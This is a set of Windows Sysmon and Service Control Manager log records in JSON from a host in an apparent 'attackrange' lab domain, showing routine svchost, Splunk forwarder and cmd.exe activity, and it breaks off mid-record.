{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.563\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.563","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76852,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The SplunkForwarder Service service entered the stopped state.","param1":"SplunkForwarder Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76853,"ProcessID":856,"ThreadID":920,"Channel":"System","Message":"The SplunkForwarder Service service entered the stopped state.","param1":"SplunkForwarder Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3178,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.804\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-001080560500}\r\nProcessId: 1180\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.804","ProcessGuid":"{41C8662E-1FF3-5F25-0000-001080560500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _RAW_envvars","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3179,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 1016\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001080560500}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"1016","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001080560500}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+f2b15|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3180,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001080560500}\r\nTargetProcessId: 1180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001080560500}","TargetProcessId":"1180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3181,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3182,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3183,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3184,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.797","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3185,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.797\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 